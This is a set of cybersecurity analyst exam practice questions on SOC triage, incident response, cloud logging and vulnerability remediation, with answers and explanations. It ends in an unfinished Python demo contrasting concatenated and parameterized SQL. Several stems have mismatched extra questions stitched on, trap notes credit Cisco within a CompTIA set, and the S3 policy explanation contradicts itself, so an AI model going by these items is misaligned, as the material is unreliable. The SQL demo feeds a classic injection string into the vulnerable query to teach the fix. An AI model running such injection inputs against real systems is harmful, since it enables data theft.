Option A is correct because re-scanning verifies whether the vulnerabilities are still present or have been remediated by other means (e.g., patching, configuration changes). Over a year, the environment may have changed, and the original scan results could be stale. An authenticated scan provides deeper visibility, but a fresh scan is the only way to confirm current relevance before taking further action.

Exam trap

CompTIA often tests the misconception that old vulnerabilities should automatically be escalated or reclassified, when in fact the first step is always to re-verify the finding with a current scan to avoid wasting resources on false positives or already-remediated issues.

320
MCQ · hard

An organization uses a SIEM with a rule that triggers when a user fails to authenticate five times within 10 minutes. Last night, the rule fired for a service account from an internal IP. What should be the first triage step?

A. Disable the service account immediately
B. Block the internal IP address at the firewall
C. Review the account's recent activity and correlate with system logs
D. Reset the service account password
Answer: C

Determines if failures are legitimate or malicious.

Why this answer

Option C is correct. The analyst should first establish the account's normal behaviour: service accounts often generate automated login attempts, so the failures may be legitimate rather than malicious. Disabling the account could cause outages, blocking the IP may be premature, and resetting the password might lock out legitimate use.

321
MCQ · medium

A network sensor must detect exploit traffic using packet payload signatures and generate alerts without blocking traffic. Which deployment is BEST? In the root-cause analysis phase, which finding would most directly explain the activity?

A.A vulnerability scanner run once per quarter
B.Host-based file integrity monitoring only
C.Suricata or Snort in IDS mode on a monitored network tap or SPAN port
D.Inline IPS mode with drop rules for all signatures
AnswerC

IDS mode observes traffic and alerts on signatures while avoiding inline blocking impact.

Why this answer

Suricata or Snort in IDS mode on a monitored network tap or SPAN port is the correct deployment because it passively inspects packet payloads against exploit signatures without blocking traffic, generating alerts only. This matches the requirement for detection without inline blocking, as IDS mode operates out-of-band on a copy of the traffic.

Exam trap

Cisco often tests the distinction between IDS and IPS modes, where candidates mistakenly choose an inline IPS deployment (e.g., with iptables rules) because they assume detection requires blocking, but the question explicitly requires no blocking.

How to eliminate wrong answers

Option A is wrong because a vulnerability scanner run once per quarter is a periodic assessment tool that identifies system weaknesses, not a real-time network sensor that detects exploit traffic via packet payload signatures; it cannot generate alerts on live traffic. Option B is wrong because host-based file integrity monitoring only detects changes to files on a host, not network-level exploit payloads in packets; it lacks the ability to inspect network traffic payloads. Option D is wrong because inline IPS mode with drop rules for all signatures blocks matching traffic, which the requirement explicitly excludes; the sensor must alert without affecting the traffic flow.

322
MCQhard

What is the net effect of the policy shown in the exhibit on requests from an IP address in the 10.0.0.0/8 range?

A.Allows all S3 actions from the 10.0.0.0/8 range and denies from other IPs.
B.Denies all S3 actions from all IP addresses.
C.Denies all S3 actions except GetObject from the 10.0.0.0/8 range.
D.Allows GetObject requests from the 10.0.0.0/8 range and denies all other S3 actions.
AnswerB

The Deny statement applies to all resources and does not have a condition, so it denies all actions on the bucket. The Allow is effectively overridden.

Why this answer

The exhibit shows an AWS S3 bucket policy with a Deny statement for all S3 actions (s3:*) whose condition block uses NotIpAddress with the value 10.0.0.0/8, so the deny applies to every request that does not originate from that range. Because the policy contains no corresponding Allow statement for the 10.0.0.0/8 range, the net effect is that all S3 actions are denied from all IP addresses, including those in 10.0.0.0/8. This is because AWS IAM policies default to implicit deny, and an explicit deny overrides any allow, so without an explicit allow for the 10.0.0.0/8 range, the deny applies universally.

Exam trap

CompTIA often tests the misconception that a Deny statement with a NotIpAddress condition effectively allows traffic from the specified IP range, when in reality it only denies traffic from outside that range, and without an explicit Allow, all traffic is denied.

How to eliminate wrong answers

Option A is wrong because the policy does not contain an Allow statement for the 10.0.0.0/8 range; it only has a Deny statement that denies all S3 actions from IPs not in 10.0.0.0/8, which does not implicitly allow actions from that range. Option C is wrong because the policy denies all S3 actions (s3:*) without exception for GetObject, and there is no condition that would allow GetObject from any IP range. Option D is wrong because the policy does not allow GetObject from 10.0.0.0/8; it denies all S3 actions from IPs outside that range, but without an explicit allow, requests from 10.0.0.0/8 are also denied by default.

323
MCQhard

A SOC analyst notices a spike in outbound traffic from a server that normally only serves web pages. The signature-based IDS did not alert. What should the analyst do next?

A.Query threat intelligence for the destination IPs
B.Disable the server immediately
C.Check for zero-day vulnerabilities
D.Increase the IDS sensitivity threshold
AnswerA

Helps determine if traffic is malicious.

Why this answer

Querying threat intelligence for the destination IPs is the correct next step because the spike in outbound traffic from a web server suggests a potential data exfiltration attempt or command-and-control (C2) communication. Since the signature-based IDS did not alert, the traffic may be using non-standard ports or encrypted channels that evade known signatures. Threat intelligence can reveal if the destination IPs are associated with known malicious actors, botnets, or recent threat campaigns, providing context to determine if the traffic is benign or malicious.

Exam trap

CompTIA often tests the misconception that a signature-based IDS failing to alert means the traffic is safe, leading candidates to incorrectly choose increasing IDS sensitivity or checking for zero-days, rather than recognizing that the analyst must pivot to threat intelligence to identify unknown or evasive threats.

How to eliminate wrong answers

Option B is wrong because immediately disabling the server is a drastic, reactive measure that could disrupt legitimate services without first confirming malicious activity; a SOC analyst should investigate and contain, not blindly shut down. Option C is wrong because checking for zero-day vulnerabilities is premature and unrelated to the immediate symptom of outbound traffic spikes; zero-day checks are part of vulnerability management, not real-time traffic analysis. Option D is wrong because increasing the IDS sensitivity threshold would likely generate more false positives and does not address the root cause—the IDS missed the traffic because it was not signature-based, not because of sensitivity settings.

324
MCQhard

In a regulated payment environment, a user reports approving an unexpected OAuth consent prompt for an app named 'Invoice Reader'. The app now has mailbox read permissions. What should the incident responder do first? During detection and analysis, which decision is most defensible? Which action best reduces risk without losing evidence?

A.Ignore it if MFA is enabled
B.Delete all emails from the mailbox
C.Only reset the user's Windows password
D.Revoke the app grant, review mailbox access, and identify other users who consented
AnswerD

OAuth consent abuse can persist without password access; revoking grants and scoping exposure contains the incident. In detection and analysis, responders need action that reduces risk while preserving the investigation record.

Why this answer

Option D is correct because the immediate priority is to revoke the malicious OAuth app grant to stop ongoing unauthorized access, then review the mailbox for any data exfiltration or tampering, and finally identify other users who may have consented to the same app to contain a broader compromise. This aligns with the NIST SP 800-61 incident response process for detection and analysis, where the most defensible decision is to remove the attacker's foothold while preserving evidence for forensic analysis. Revoking the grant directly addresses the OAuth consent attack vector, which bypasses traditional password-based controls and MFA.

Exam trap

Cisco often tests the misconception that MFA or password resets are sufficient to stop OAuth-based attacks, when in reality OAuth grants operate outside the authentication boundary and require explicit revocation of the app's permissions.

How to eliminate wrong answers

Option A is wrong because ignoring the incident despite MFA being enabled is a critical mistake — OAuth consent grants allow the app to access the mailbox without requiring the user's password or MFA, so MFA provides no protection against this type of attack. Option B is wrong because deleting all emails from the mailbox destroys potential evidence of data exfiltration, mailbox rules created by the attacker, or other indicators of compromise, violating the principle of preserving evidence during incident response. Option C is wrong because resetting the user's Windows password does not invalidate the OAuth access token or refresh token already issued to the malicious app; the app retains mailbox access via its own credentials, making the password reset ineffective.

325
MCQhard

A container workload unexpectedly starts a shell, mounts the host filesystem, and attempts outbound connections to an unknown IP. Which telemetry is MOST useful? In the evidence source phase, which evidence source best supports or refutes the detection?

A.Only monthly vulnerability scan summaries
B.Only user password age reports
C.Only physical datacenter access logs
D.Container runtime events, Kubernetes audit logs, and network flow from the pod
AnswerD

Runtime, orchestration, and network telemetry together show process execution, privilege context, and external communication.

Why this answer

Container runtime events (e.g., from containerd or CRI-O) capture process spawns like an unexpected shell, Kubernetes audit logs record API calls that could indicate a compromised pod mounting the host filesystem, and network flow logs from the pod (e.g., via eBPF or Calico) reveal outbound connections to an unknown IP. Together, these three telemetry sources provide direct, real-time evidence of the three suspicious behaviors described, making them the most useful for detection and investigation.

Exam trap

CompTIA often tests the distinction between passive, periodic compliance artifacts (vulnerability scans, password reports) and active, real-time telemetry (runtime events, audit logs, network flows) that directly capture the sequence of malicious actions in a containerized environment.

How to eliminate wrong answers

Option A is wrong because monthly vulnerability scan summaries are point-in-time snapshots of known CVEs and cannot detect real-time anomalous behavior like a shell spawn, filesystem mount, or outbound connection. Option B is wrong because user password age reports are identity and access management artifacts unrelated to runtime container activity or network flows. Option C is wrong because physical datacenter access logs track human entry to facilities, not container-level process or network events, and cannot refute or support a workload compromise.

326
MCQhard

A security analyst is tasked with performing a risk assessment for a new web application. The application will handle sensitive customer data. Which of the following should the analyst do FIRST to identify vulnerabilities specific to the application?

A.Run a network vulnerability scan against the application server.
B.Perform a penetration test on the application.
C.Perform a source code review.
D.Conduct a threat model of the application.
AnswerD

Threat modeling identifies threats and vulnerabilities early.

Why this answer

Option D is correct because a threat model helps identify potential vulnerabilities early in the development lifecycle. Option A is wrong because a network scan is too broad. Option B is wrong because a penetration test is performed later.

Option C is wrong because a code review may be part of the process, but threat modeling comes first.

327
Multi-Selectmedium

Which items help make a post-incident report useful for technical teams? (Choose two.)

Select 2 answers
A.Generic motivational slogans
B.Unrelated financial forecasts
C.Root cause and exploited control gaps
D.Specific remediation tasks with owners and validation steps
AnswersC, D

Technical teams need to know what failed.

Why this answer

Option C is correct because a post-incident report must include the root cause and exploited control gaps to enable technical teams to implement targeted remediation. Without identifying the specific vulnerability (e.g., unpatched CVE, misconfigured firewall rule, weak authentication mechanism) and the control failure that allowed the exploit, the report lacks actionable intelligence for hardening defenses. Option D is correct because specific remediation tasks with named owners and validation steps turn those findings into work that can be assigned, tracked, and verified as complete.

Exam trap

Cisco often tests the misconception that a post-incident report should include broad business or motivational content, but the exam expects candidates to recognize that only technical, actionable details (like root cause and control gaps) are useful for remediation teams.

328
MCQmedium

A deception credential placed in a file share is used to authenticate to a server. No legitimate user should know the credential. What does this most likely indicate? In the containment trade-off phase, which response balances containment with evidence preservation?

A.A scheduled password rotation completed successfully
B.The file share requires more storage capacity
C.Credential access or lateral movement activity that warrants high-priority investigation
D.The SIEM parser is always broken
AnswerC

Use of a honey credential is a high-fidelity signal because legitimate workflows should not touch it.

Why this answer

The presence of a deception credential in a file share that is used to authenticate to a server, with no legitimate user knowing it, strongly indicates that an attacker has discovered and used the credential to gain unauthorized access. This is a classic sign of credential access (stealing credentials) followed by lateral movement (using them to authenticate to another system). Such activity is a high-priority incident because it suggests the attacker has moved beyond initial compromise and is actively expanding their foothold, which requires immediate containment and investigation.

Exam trap

Cisco often tests the distinction between benign administrative actions (like password rotation) and malicious credential abuse; the trap here is that candidates may dismiss the credential usage as a routine operation rather than recognizing it as a high-priority indicator of compromise.

How to eliminate wrong answers

Option A is wrong because a scheduled password rotation completing successfully would not involve a credential that no legitimate user should know; password rotations are planned events that update credentials for authorized use, not create unknown credentials used for authentication. Option B is wrong because the file share requiring more storage capacity is a capacity planning issue unrelated to security events; it does not explain why a credential unknown to legitimate users is being used to authenticate to a server. Option D is wrong because a broken SIEM parser would produce missing or malformed events, not a genuine authentication event using a credential that only an attacker who read the file share could have obtained.

329
MCQhard

During forensic analysis of a compromised server, the analyst finds that the attacker deleted the system logs. Which data source is most likely to still contain relevant evidence?

A.Memory dump from before the attack
B.Endpoint detection and response (EDR) telemetry
C.Network flow logs
D.Backup tapes
AnswerB

EDR typically records process creations and network connections off-host.

Why this answer

EDR telemetry is the most reliable source because it captures process creation, network connections, file modifications, and registry changes in real-time, storing them off-host. Even if an attacker deletes local system logs, the EDR agent's telemetry stream remains intact on the central management server, providing a forensic timeline of the attacker's actions.

Exam trap

CompTIA often tests the misconception that backup tapes are the ultimate forensic source, but the trap here is that attackers often delete logs during the incident, and only real-time, off-host telemetry (like EDR) preserves the sequence of events that occurred on the compromised host.

How to eliminate wrong answers

Option A is wrong because a memory dump from before the attack would not contain evidence of the attack itself; it captures a snapshot of the system state at that earlier time, not the attacker's activities. Option C is wrong because network flow logs (e.g., NetFlow, IPFIX) only record metadata like source/destination IPs, ports, and byte counts, not the actual system-level events (e.g., log deletion, process execution) that occurred on the compromised server. Option D is wrong because backup tapes contain point-in-time copies of files and system state, but they are typically taken on a schedule (e.g., nightly) and may not include the logs that were deleted during the attack window; moreover, restoring from backup is time-consuming and may overwrite current evidence.

330
MCQeasy

A user opens an invoice document and shortly afterward the endpoint runs wscript.exe from the user's profile. Which detection logic is most relevant? In the root-cause analysis phase, which finding would most directly explain the activity?

A.Office document spawning a script interpreter from a user context
B.High CPU usage on the print server
C.A password expiry warning
D.Successful DHCP renewal
AnswerA

Office-to-script process chains are common initial execution patterns for phishing payloads.

Why this answer

Option A is correct because the scenario describes a classic phishing attack where a malicious macro or embedded script in an Office document (the invoice) executes wscript.exe from the user's profile. This behavior matches the detection logic of 'Office document spawning a script interpreter from a user context,' which is a key indicator of script-based malware execution. The root-cause analysis would identify the malicious document as the initial vector, directly explaining the subsequent process execution.

Exam trap

Cisco often tests the distinction between a security detection logic (process ancestry) and unrelated operational metrics (CPU usage, password expiry) to see if candidates can focus on the direct cause of a security incident rather than being distracted by noise.

How to eliminate wrong answers

Option B is wrong because high CPU usage on the print server is unrelated to the endpoint execution of wscript.exe from a user profile; it describes a performance issue, not a security event involving script execution. Option C is wrong because a password expiry warning is an administrative notification that does not explain the execution of a script interpreter from a user context; it is a separate operational concern, not a root cause for malicious process spawning. Option D is wrong because a successful DHCP renewal is routine network housekeeping that occurs on every endpoint and has no relationship to an Office document launching a script interpreter.

331
MCQmedium

A user receives repeated MFA prompts and eventually approves one they did not initiate. Which behaviour should the analyst classify this as? In the detection engineering phase, which detection or tuning approach would reduce noise without losing the signal?

A.DNS tunnelling
B.SSL certificate expiry
C.MFA fatigue or push-bombing attack
D.Password spraying only
AnswerC

Repeated unsolicited prompts that lead to approval are characteristic of MFA fatigue attacks.

Why this answer

The scenario describes MFA fatigue (also called push-bombing), where an attacker repeatedly sends MFA push notifications to a user until the user, annoyed or confused, approves one. This is a social engineering technique that exploits human behavior, not a technical vulnerability. Option C correctly identifies this attack pattern, which is a known tactic in credential-stuffing and account-takeover campaigns.

Exam trap

Cisco often tests the distinction between technical exploits (like DNS tunnelling) and human-factor attacks (like MFA fatigue), so candidates may mistakenly choose a technical-sounding option when the question describes user behavior rather than a protocol-level attack.

How to eliminate wrong answers

Option A is wrong because DNS tunnelling encodes data in DNS queries/responses to exfiltrate data or establish C2 channels; it does not involve repeated MFA prompts or user approval. Option B is wrong because SSL certificate expiry causes browser warnings or connection failures, not repeated MFA push notifications; it is a certificate lifecycle issue, not an authentication attack. Option D is wrong because password spraying alone describes guessing a few common passwords across many accounts; it may be how the attacker obtained a valid password beforehand, but it does not describe the repeated push prompts and the user's eventual approval that define this scenario.

332
MCQmedium

A deception credential placed in a file share is used to authenticate to a server. No legitimate user should know the credential. What does this most likely indicate? In the alert triage phase, which action gives the analyst the clearest next triage step?

A.The SIEM parser is always broken
B.A scheduled password rotation completed successfully
C.Credential access or lateral movement activity that warrants high-priority investigation
D.The file share requires more storage capacity
AnswerC

Use of a honey credential is a high-fidelity signal because legitimate workflows should not touch it.

Why this answer

A deception credential that no legitimate user should know being used to authenticate to a server is a classic indicator of credential theft and lateral movement. In the alert triage phase, this finding warrants high-priority investigation because it suggests an attacker has successfully extracted the credential from the file share and is using it to move laterally within the network, which is a critical security incident.

Exam trap

Cisco often tests the concept that deception credentials are specifically designed to detect credential theft and lateral movement, and candidates may mistakenly think this indicates a benign process like password rotation or a SIEM misconfiguration.

How to eliminate wrong answers

Option A is wrong because a broken SIEM parser would typically cause missing or malformed logs, not the generation of a specific, actionable alert about a deception credential being used for authentication. Option B is wrong because a scheduled password rotation would update the credential on the server, not trigger an authentication event using the old deception credential; password rotation does not involve authentication attempts with the credential being rotated. Option D is wrong because storage capacity on the file share is a capacity planning concern and does not explain an authentication event using a credential that no legitimate user should know.

333
MCQmedium

A WAF generates repeated SQL injection alerts against a login endpoint. The application team says the requests returned HTTP 200. What should the analyst do before declaring compromise? In the root-cause analysis phase, which finding would most directly explain the activity?

A.Review application logs for query errors, authentication events, and abnormal database access
B.Disable the WAF rule because it may be noisy
C.Ask users to change passwords without checking logs
D.Treat every HTTP 200 as proof of exploitation
AnswerA

HTTP 200 can occur for blocked, handled, or successful requests; application and database context determine impact.

Why this answer

Option A is correct because the WAF alerts indicate potential SQL injection attempts, but HTTP 200 responses do not rule out successful exploitation. The analyst must review application logs for actual query errors, authentication anomalies, or unauthorized database access to confirm whether the injection succeeded. Without log correlation, the analyst cannot determine if the WAF blocked the attack or if the payload bypassed it and executed on the backend.

Exam trap

Cisco often tests the misconception that HTTP 200 means no compromise occurred, when in fact SQL injection can succeed while returning a normal status code, especially with blind injection or when the application catches errors gracefully.

How to eliminate wrong answers

Option B is wrong because disabling the WAF rule without investigation removes a critical security control and ignores the possibility that the alerts represent real attacks that bypassed detection or were partially blocked. Option C is wrong because forcing password changes without verifying logs fails to address the root cause and may cause unnecessary user disruption; it assumes compromise without evidence, which violates the principle of validate-before-remediate. Option D is wrong because an HTTP 200 can be returned for requests that the WAF blocked, that the application handled gracefully, or that succeeded; the status code alone does not indicate which, so treating every 200 as proof of exploitation overstates the evidence.

334
MCQeasy

A critical vulnerability affected the customer portal, but no evidence of exploitation was found. What should the executive summary emphasize? If the primary audience is SOC manager, which content choice is most appropriate?

A.Business risk, customer impact assessment, remediation status, and remaining exposure
B.Every command the scanner executed
C.Raw packet captures from the scan
D.A list of analyst shift times only
AnswerA

Executives need business impact and risk posture, not raw technical noise. The report should be tuned to SOC manager while preserving factual accuracy.

Why this answer

Option A is correct because an executive summary for a SOC manager must focus on business risk, customer impact, remediation status, and remaining exposure. Since no exploitation was found, the emphasis shifts to the potential impact and the steps taken to mitigate the vulnerability, aligning with the SOC manager's need to communicate risk to leadership and prioritize resources.

Exam trap

Cisco often tests the distinction between technical detail and executive-level reporting, trapping candidates who think raw data or scan logs are appropriate for a summary aimed at a SOC manager who needs actionable risk insights, not raw output.

How to eliminate wrong answers

Option B is wrong because listing every command the scanner executed is too technical and granular for an executive summary; it belongs in a detailed technical report for analysts, not a high-level overview for a SOC manager. Option C is wrong because raw packet captures from the scan are irrelevant to an executive summary; they provide no context on business risk or remediation and are only useful for deep forensic analysis, not for communicating the vulnerability's status to management. Option D is wrong because a list of analyst shift times says nothing about the vulnerability, its impact, or its remediation status, and so gives the SOC manager no basis for a risk decision.

335
MCQeasy

A medium-sized company has experienced a ransomware attack that encrypted critical file servers. The incident response team has contained the outbreak and restored data from backups. The CISO has requested a post-incident report. The report must include a timeline, root cause analysis, lessons learned, and recommendations. The security team is currently overwhelmed with recovery tasks. The CISO wants the report delivered in 24 hours. Which of the following is the BEST course of action for the security analyst assigned to write the report?

A.Wait until all recovery tasks are complete to ensure accurate information
B.Delegate the report writing to a junior analyst while focusing on technical recovery
C.Use the incident response playbook template to draft the report immediately, incorporating available information and noting gaps
D.Request an extension from the CISO due to resource constraints
AnswerC

Allows for a timely draft that can be refined later, meeting the deadline while documenting what is known.

Why this answer

Option C is correct because the CISO needs a timely post-incident report within 24 hours, and using the incident response playbook template allows the analyst to immediately draft the report with available information while noting gaps. This approach balances the urgency of the deadline with the need for structured documentation, even though recovery tasks are ongoing. It ensures that critical findings are captured promptly without waiting for full recovery, which could delay lessons learned and recommendations.

Exam trap

CompTIA often tests the tension between thoroughness and timeliness in incident reporting, and the trap here is that candidates may choose to wait for complete data (Option A) or delegate (Option B) instead of using a structured template to meet the deadline while acknowledging information gaps.

How to eliminate wrong answers

Option A is wrong because waiting until all recovery tasks are complete would likely exceed the 24-hour deadline, delaying the CISO's required report and potentially missing the window for actionable recommendations. Option B is wrong because delegating to a junior analyst without proper oversight could introduce inaccuracies in the timeline, root cause analysis, and lessons learned, especially if the junior lacks incident response experience. Option D is wrong because requesting an extension due to resource constraints may not be feasible given the CISO's explicit deadline, and it fails to leverage available templates and existing data to meet the requirement.

336
MCQmedium

A SOC analyst reviews DNS telemetry and sees a workstation resolving hundreds of algorithmically generated domains at fixed intervals, with most responses returning NXDOMAIN. What evidence should the analyst prioritize to validate command-and-control beaconing? In the containment trade-off phase, which response balances containment with evidence preservation?

A.Correlate DNS query logs with endpoint process and network connection telemetry
B.Search only for successful HTTP 200 responses
C.Block all DNS traffic from the subnet
D.Delete the host from the SIEM asset inventory
AnswerA

The pattern is suspicious, but process and connection context shows whether a host process is repeatedly attempting outbound C2 communication.

Why this answer

Option A is correct because correlating DNS query logs with endpoint process and network connection telemetry directly validates command-and-control (C2) beaconing. The algorithmically generated domains (AGDs) and NXDOMAIN responses are classic indicators of a domain generation algorithm (DGA) attempting to resolve a C2 server that may be offline or blocked. By linking the DNS queries to specific processes and network connections on the endpoint, the analyst can confirm whether the workstation is executing malicious code that generates these queries, rather than benign software or a false positive.

Exam trap

Cisco often tests the misconception that NXDOMAIN responses are irrelevant or that blocking all traffic is a safe containment step, when in reality the key is to correlate multiple data sources to confirm malicious activity without prematurely destroying evidence.

How to eliminate wrong answers

Option B is wrong because searching only for successful HTTP 200 responses would miss the majority of DGA-based C2 traffic, which often results in NXDOMAIN responses when the C2 server is not yet active or has been sinkholed; C2 beaconing frequently relies on failed DNS resolutions as part of its algorithm. Option C is wrong because blocking all DNS traffic from the subnet would immediately disrupt network operations for all hosts, potentially alerting the adversary and destroying volatile evidence such as active network connections and process memory, violating the containment trade-off principle of preserving forensic data before taking disruptive action. Option D is wrong because deleting the host from the SIEM asset inventory removes the analyst's visibility into the very system under investigation and discards the correlation context needed to validate the beaconing; it neither contains the threat nor preserves evidence.

337
MCQhard

A cloud tenant shows an unusual spike in IAM policy changes, access key creation, and failed console logons from a new country. Which telemetry set gives the strongest evidence for control-plane compromise? In the root-cause analysis phase, which finding would most directly explain the activity?

A.Web server access logs from the public website
B.Endpoint antivirus quarantine reports only
C.Cloud audit logs for identity, policy, and key-management API calls
D.Packet captures from user laptops only
AnswerC

Control-plane attacks are best investigated through authoritative audit events that record who changed identity and access configuration.

Why this answer

Option C is correct because cloud audit logs (e.g., AWS CloudTrail, Azure Monitor, GCP Cloud Audit Logs) capture control-plane API calls such as IAM policy changes, access key creation, and failed console logons. These logs directly record identity and access management operations, providing the strongest evidence of control-plane compromise by showing who made the changes, from which source IP, and at what time.

Exam trap

Cisco often tests the distinction between data-plane logs (e.g., web server logs) and control-plane logs (e.g., cloud audit logs), tricking candidates into choosing web logs because they seem more familiar, even though they cannot capture IAM or key management events.

How to eliminate wrong answers

Option A is wrong because web server access logs from a public website only record HTTP requests to the application layer (e.g., GET/POST to a web app), not IAM policy changes or key creation, which are control-plane operations. Option B is wrong because endpoint antivirus quarantine reports only detect malware on individual hosts, not cloud-level identity or policy changes; they are irrelevant to control-plane API calls. Option D is wrong because packet captures from user laptops show traffic leaving those devices and cannot record the cloud provider's own API calls, which are logged only by the provider's audit service regardless of the client that issued them.

338
MCQhard

During a penetration test, a tester successfully exploits a vulnerability in a web application and gains a shell on the backend server. The tester then attempts to pivot to other hosts. Which of the following security controls would be most effective in limiting lateral movement in this scenario?

A.Host-based intrusion prevention system (HIPS)
B.Full disk encryption
C.Network segmentation with strict firewall rules
D.Application whitelisting
AnswerC

Segmentation limits the ability to connect to other hosts, hindering lateral movement.

Why this answer

Network segmentation with strict firewall rules (C) is the most effective control because it directly restricts the ability of an attacker who has compromised one host to initiate connections to other hosts. By enforcing least-privilege network access between segments (e.g., using VLANs and ACLs), lateral movement techniques such as port scanning, SMB relay, or RDP brute force are blocked at the network layer, regardless of the attacker's shell access.

Exam trap

CompTIA often tests the misconception that endpoint controls like HIPS or application whitelisting are sufficient to stop lateral movement, but the trap here is that once an attacker has a shell, they can often bypass or disable host-based controls, whereas network segmentation is a preventive control that operates independently of the compromised host's state.

How to eliminate wrong answers

Option A is wrong because a host-based intrusion prevention system (HIPS) monitors and blocks malicious behavior on the compromised host itself, but once the attacker has a shell, they can often disable or evade HIPS before pivoting; HIPS does not prevent network-level lateral movement to other hosts. Option B is wrong because full disk encryption protects data at rest on the compromised host's storage, but it does nothing to prevent the attacker from using the host as a pivot point to reach other systems over the network. Option D is wrong because application whitelisting controls which executables can run on the compromised host, but the attacker already has a shell and can use built-in OS tools (e.g., PowerShell, netcat) or living-off-the-land binaries to pivot; whitelisting does not block network connections to other hosts.

339
MCQeasy

A company uses a cloud-based identity provider (IdP) for single sign-on (SSO) to all applications. The SOC receives an alert that a user's account logged in from an IP address associated with a country where the company has no offices. The user is currently on a planned vacation and is not in that country. The analyst reviews the authentication logs and sees the login used a valid token and correct multi-factor authentication (MFA) method. Which of the following is the BEST initial step to handle this alert?

A.Review the user's recent activity for other anomalies.
B.Add the IP address to the block list.
C.Contact the user to verify if they logged in.
D.Disable the user account immediately.
AnswerC

Quickest way to confirm if it was the user or a compromise.

Why this answer

Option C is correct because quickly contacting the user can confirm whether the login was authorized (e.g., using a VPN or traveling). Disabling the account or blocking the IP without verification could impact productivity. Option A is a good follow-up but not the first step.

340
MCQeasy

A security analyst is preparing a monthly dashboard for the board of directors. Which metric would best demonstrate the effectiveness of the security program in reducing risk?

A.Number of security incidents detected.
B.Mean time to detect (MTTD) and mean time to respond (MTTR).
C.Percentage of employees who completed security awareness training.
D.Number of firewall rules configured.
AnswerB

These metrics directly reflect the efficiency of detection and response processes.

Why this answer

Mean time to detect (MTTD) and mean time to respond (MTTR) directly quantify the security program's operational efficiency in identifying and containing threats, which reduces the window of exposure and potential damage. A lower MTTD/MTTR indicates faster detection and response, directly correlating with reduced risk from incidents. This makes it the best metric for demonstrating risk reduction effectiveness to the board.

Exam trap

CompTIA often tests the misconception that volume or compliance metrics (like incident count or training completion) directly indicate risk reduction, when in fact operational efficiency metrics (MTTD/MTTR) are the true measure of a security program's effectiveness in minimizing impact.

How to eliminate wrong answers

Option A is wrong because the number of security incidents detected is a volume metric that does not indicate how quickly or effectively incidents are handled; a high number could reflect better detection rather than higher risk, and it provides no insight into response quality. Option C is wrong because the percentage of employees who completed security awareness training is a compliance or training metric that measures awareness, not the operational effectiveness of the security program in detecting and responding to active threats. Option D is wrong because the number of firewall rules configured is a configuration metric that does not measure risk reduction; more rules can increase complexity and attack surface without improving security posture.

341
MCQeasy

A security analyst is conducting a vulnerability assessment of a web application. The assessment reveals that the application is vulnerable to SQL injection. Which of the following is the MOST effective remediation?

A.Upgrade the web application framework to the latest version
B.Deploy a web application firewall (WAF)
C.Use parameterized queries in the application code
D.Implement client-side input validation
AnswerC

Parameterized queries eliminate SQL injection vulnerabilities.

Why this answer

Parameterized queries (also known as prepared statements) are the most effective remediation for SQL injection because they separate SQL logic from user-supplied data by using placeholders. The database engine treats the input strictly as data, not executable code, which prevents an attacker from altering the query structure. This addresses the root cause at the application layer, unlike other controls that only mitigate or detect the attack.

Exam trap

CompTIA often tests the misconception that a WAF is a sufficient fix for SQL injection, but the trap here is that a WAF is a compensating control, not a remediation—the question asks for the 'most effective remediation,' which must address the root cause in the code.

How to eliminate wrong answers

Option A is wrong because upgrading the web application framework may patch known vulnerabilities but does not fix the insecure coding practice of concatenating user input into SQL statements; the SQL injection flaw remains if the code itself is not changed. Option B is wrong because a web application firewall (WAF) can detect and block some SQL injection payloads, but it is a reactive, signature-based control that can be bypassed with obfuscation or novel attack patterns, and it does not eliminate the underlying vulnerability. Option D is wrong because client-side input validation can be easily bypassed by an attacker using tools like Burp Suite or cURL to send crafted requests directly to the server, and it provides no security against server-side injection.
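The root-cause fix described above, shown as an added example (not code from the page) with the vulnerable form beside the remediated one. It uses Python's built-in `sqlite3` module and a constructed in-memory `users` table so it runs offline; the table, the rows and the lookup functions are assumptions for the demonstration.

```python
"""String-built SQL versus a parameterized query (added example).

Assumptions: a constructed in-memory SQLite table `users(username, role)`;
the lookup functions are illustrative, not from any real application.
"""
import sqlite3


def make_db():
    """Build a small constructed users table in memory."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("alice", "admin"), ("bob", "user"), ("carol", "user")],
    )
    return conn


def lookup_vulnerable(conn, username):
    """The defect: user input is concatenated into the SQL text, so it can
    change the query's structure instead of being treated as a value."""
    sql = "SELECT username, role FROM users WHERE username = '" + username + "'"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, username):
    """The remediation: the placeholder keeps the SQL fixed; the driver passes
    the input to the engine strictly as data, whatever characters it contains."""
    sql = "SELECT username, role FROM users WHERE username = ?"
    return conn.execute(sql, (username,)).fetchall()


def compare(username):
    """Run both lookups on the same input and return the row counts."""
    conn = make_db()
    return {
        "vulnerable_rows": len(lookup_vulnerable(conn, username)),
        "parameterized_rows": len(lookup_parameterized(conn, username)),
    }


if __name__ == "__main__":
    print(compare("alice"))          # both return 1 row
    print(compare("x' OR '1'='1"))   # only the concatenated query returns every row
```

The same input that widens the concatenated query to every row simply matches nothing under the parameterized version, which is why the page calls this a remediation rather than a mitigation: there is no query shape left for a payload to alter.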

342
MCQhard

A new cloud log source is onboarded, but analytics fail because source IP, user, and action fields are mapped inconsistently. What should the engineer fix? In the evidence source phase, which evidence source best supports or refutes the detection?

A.Increase the dashboard refresh interval
B.Move logs to cold storage immediately
C.Log normalization and field mapping in the parser
D.Disable all enrichment lookups
AnswerC

Detection rules depend on consistent normalized fields across sources.

Why this answer

Option C is correct because inconsistent field mapping (source IP, user, action) prevents the SIEM from correlating events correctly. Log normalization via a parser ensures that fields from the new cloud log source are transformed into a consistent schema (e.g., ECS or CIM), enabling analytics to function. Without fixing the parser, the data remains unusable regardless of other configuration changes.

Exam trap

Cisco often tests the misconception that performance tuning (e.g., refresh intervals) or storage management (e.g., cold storage) can fix data quality issues, when the real problem is a misconfigured parser or normalization step in the ingestion pipeline.

How to eliminate wrong answers

Option A is wrong because increasing the dashboard refresh interval does not address the root cause of inconsistent field mapping; it only changes how often the dashboard updates, which would still show incomplete or misaligned data. Option B is wrong because moving logs to cold storage immediately would archive the data without resolving the parsing issue, making the logs inaccessible for real-time analytics and failing to fix the mapping inconsistency.
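The parser-side normalization the answer refers to, as an added example that is not part of the page: two constructed cloud log formats are mapped onto one field schema, records missing a required field are rejected visibly rather than silently, and a single analytic then runs over both sources. The vendor field names, the ECS-style target names (`source.ip`, `user.name`, `event.action`) and the sample lines are assumptions made for this example.

```python
"""Normalize two constructed cloud log formats into one schema (added example).

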